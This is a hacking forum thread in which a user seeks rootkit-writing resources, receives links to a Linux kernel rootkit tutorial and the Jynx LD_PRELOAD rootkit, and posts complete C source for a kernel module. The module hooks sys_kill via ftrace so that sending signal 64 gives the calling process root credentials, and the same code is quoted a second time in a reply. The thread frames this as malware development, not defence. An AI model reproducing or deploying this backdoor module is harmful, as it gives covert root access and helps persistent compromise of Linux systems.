[REQUEST] Resources for Rootkit Development?
#1
Recently I've been trying to learn more and more about programming and malware. My end goal currently is to write a rootkit for windows.
So far I have a pretty good grasp on programming (specifically with different low-level languages like C) and x86 assembly (still trying to figure out how to use windows API from ASM). Are there any specific resources anyone wants to share that could possibly help me in this journey? Any tips for learning? I'm open to anything.
Thanks a lot for sharing in advance!
Reply
#2
When i have a little bit more time on my hands i will dig through my mountain of E-books, metaphorically speaking. And get you set up with some i think you may find helpful. I will be quite busy this week unfortunately though.
Reply
#3
(01-20-2021, 07:52 AM)Vector Wrote: When i have a little bit more time on my hands i will dig through my mountain of E-books, metaphorically speaking. And get you set up with some i think you may find helpful. I will be quite busy this week unfortunately though.
Take your time! I appreciate the fact that you're willing to do this later.
Thanks!
Reply
#4
This is a good tutorial that goes really in depth: https://xcellerator.github.io/posts/linux_rootkits_01/. It covers kernel mode rootkits. You might want to start with something in userland like a LD_PRELOAD rootkit. Jynx rootkit is a LD_PRELOAD rootkit you might want to check out. https://github.com/chokepoint/Jynx2
Reply
#5
(01-20-2021, 05:59 PM)DeepLogic Wrote: This is a good tutorial that goes really in depth: https://xcellerator.github.io/posts/linux_rootkits_01/. It covers kernel mode rootkits. You might want to start with something in userland like a LD_PRELOAD rootkit. Jynx rootkit is a LD_PRELOAD rootkit you might want to check out. https://github.com/chokepoint/Jynx2
All looks good! Thanks a lot!
Reply
#6
I would encourage anyone that wants to learn MalDev to learn about Linux and Windows techniques. Glad to see DeepLogic linked you some Linux related stuff. `LD_PRELOAD` isn't a thing on Windows though.

That said, i've opened a secure repository for you UEAX. While i work i'll sync some of the resources i promised you to there. I will send you a PM with the link once everything is ready.
Reply
#7
Glad to hear everyone here is encouraging! And thanks a lot for thaet Vector. I've taken a look at some of your provided resources DeepLogic and I've been writing some really cool LKMs for Linux. Really interesting stuff!
Thanks a lot everyone.
Reply
#8
(01-21-2021, 03:50 AM)ueax Wrote: Glad to hear everyone here is encouraging! And thanks a lot for thaet Vector. I've taken a look at some of your provided resources DeepLogic and I've been writing some really cool LKMs for Linux. Really interesting stuff!
Thanks a lot everyone.

It'd be cool if we could check out some of the LKM's. And your work more generally Smile
Reply
#9
(01-21-2021, 04:11 AM)Vector Wrote:
(01-21-2021, 03:50 AM)ueax Wrote: Glad to hear everyone here is encouraging! And thanks a lot for thaet Vector. I've taken a look at some of your provided resources DeepLogic and I've been writing some really cool LKMs for Linux. Really interesting stuff!
Thanks a lot everyone.

It'd be cool if we could check out some of the LKM's. And your work more generally Smile

Sure! I had followed the resource in DeepLogic's post which had a very walkthrough with how to write a LKM for Linux in C.
After going through a few sections, I made a LKM that if a user had permissions to use 'insmod', they could insert the LKM below
that if a user were to run 'kill -64 123' (123 being any number) they would escalate to root.

I'm relatively new to this kind of thing so go easy on me lol.

ftrace_helper.h can be found here: https://github.com/xcellerator/linux_ker...e_helper.h
ftrace_helper.h basically gives some higher level functions that can be used to hook existing syscalls.

Code:
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/kallsyms.h>
#include <linux/version.h>

#include "ftrace_helper.h"

MODULE_LICENSE("GPL");
MODULE_AUTHOR("ueax");
MODULE_DESCRIPTION("syskill esc");
MODULE_VERSION("0.3");
#if defined(CONFIG_X86_64) && (LINUX_VERSION_CODE >= KERNEL_VERSION(4,17,0))
#define PTREGS_SYSCALL_STUBS 1
#endif

#ifdef PTREGS_SYSCALL_STUBS
static asmlinkage long (*orig_kill)(const struct pt_regs *);

asmlinkage int hook_kill(const struct pt_regs *regs)
{
    void set_root(void);
    int sig = regs->si;
    if (sig == 64)
    {
        printk(KERN_INFO "RootKit: Giving root...\n");
        set_root();
        return 0;
    }
    return orig_kill(regs);
}

#else
static asmlinkage long (*orig_kill)(pid_t pid, int sig);

static asmlinkage int hook_kill(pid_t pid, int sig)
{
    void set_root(void);
    if (sig == 64)
    {
        printk(KERN_INFO "RootKit: Giving root...\n");
        set_root();
        return 0;
    }
return orig_kill(pid, sig);
}
#endif

void set_root(void)
{
    struct cred *root;
    root = prepare_creds();

    if (root == NULL)  return;

    root->uid.val = root->gid.val = 0;
    root->euid.val = root->egid.val = 0;
    root->suid.val = root->sgid.val = 0;
    root->fsuid.val = root->fsgid.val = 0;

    commit_creds(root);
}

static struct ftrace_hook hooks[] =
{
    HOOK("sys_kill", hook_kill, &orig_kill),
};

static int __init rootkit_init(void)
{
    int err;
    err = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
    if (err)
        return err;
    printk(KERN_INFO "RootKit: Loaded.\n");
    return 0;
}

static void __exit rootkit_exit(void)
{
    fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
    printk(KERN_INFO "RootKit: Unloaded\n");
}
module_init(rootkit_init);
module_exit(rootkit_exit);

I've also done a little bit of other malware developing in the past, but it isn't as interesting as this.
Reply
#10
(01-21-2021, 05:08 AM)ueax Wrote: Sure! I had followed the resource in DeepLogic's post which had a very walkthrough with how to write a LKM for Linux in C.
After going through a few sections, I made a LKM that if a user had permissions to use 'insmod', they could insert the LKM below
that if a user were to run 'kill -64 123' (123 being any number) they would escalate to root.

I'm relatively new to this kind of thing so go easy on me lol.

ftrace_helper.h can be found here: https://github.com/xcellerator/linux_ker...e_helper.h
ftrace_helper.h basically gives some higher level functions that can be used to hook existing syscalls.

Code:
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/kallsyms.h>
#include <linux/version.h>

#include "ftrace_helper.h"

MODULE_LICENSE("GPL");
MODULE_AUTHOR("ueax");
MODULE_DESCRIPTION("syskill esc");
MODULE_VERSION("0.3");
#if defined(CONFIG_X86_64) && (LINUX_VERSION_CODE >= KERNEL_VERSION(4,17,0))
#define PTREGS_SYSCALL_STUBS 1
#endif

#ifdef PTREGS_SYSCALL_STUBS
static asmlinkage long (*orig_kill)(const struct pt_regs *);

asmlinkage int hook_kill(const struct pt_regs *regs)
{
    void set_root(void);
    int sig = regs->si;
    if (sig == 64)
    {
        printk(KERN_INFO "RootKit: Giving root...\n");
        set_root();
        return 0;
    }
    return orig_kill(regs);
}

#else
static asmlinkage long (*orig_kill)(pid_t pid, int sig);

static asmlinkage int hook_kill(pid_t pid, int sig)
{
    void set_root(void);
    if (sig == 64)
    {
        printk(KERN_INFO "RootKit: Giving root...\n");
        set_root();
        return 0;
    }
return orig_kill(pid, sig);
}
#endif

void set_root(void)
{
    struct cred *root;
    root = prepare_creds();

    if (root == NULL)  return;

    root->uid.val = root->gid.val = 0;
    root->euid.val = root->egid.val = 0;
    root->suid.val = root->sgid.val = 0;
    root->fsuid.val = root->fsgid.val = 0;

    commit_creds(root);
}

static struct ftrace_hook hooks[] =
{
    HOOK("sys_kill", hook_kill, &orig_kill),
};

static int __init rootkit_init(void)
{
    int err;
    err = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
    if (err)
        return err;
    printk(KERN_INFO "RootKit: Loaded.\n");
    return 0;
}

static void __exit rootkit_exit(void)
{
    fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
    printk(KERN_INFO "RootKit: Unloaded\n");
}
module_init(rootkit_init);
module_exit(rootkit_exit);

I've also done a little bit of other malware developing in the past, but it isn't as interesting as this.

Not bad at all, how are you planning to load the kernel modules? Also, it's good to know you have some experience with MalDev, i have adjusted the Data Stream to your Secure Repo accordingly. It will be ready in 30 minutes. I have also added you on XMPP.

I have sent you a PM with the pertinent information related to your Secure Repo.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  CIA Vault7 Leak - Development Tradecraft DOs and DON'Ts Insider 2 11,383 04-25-2020, 02:21 PM
Last Post: Insider
  Ransomware Development Made Easy BigBoss 4 8,685 04-27-2019, 03:58 PM
Last Post: hotmagnet
  Vlany - LD_PRELOAD rootkit (x86 & x86_64) [In active development] Yagmi 3 10,126 11-24-2016, 02:59 AM
Last Post: fsck
  MS PowerShell Resources. Vector 1 7,545 11-24-2016, 02:43 AM
Last Post: fsck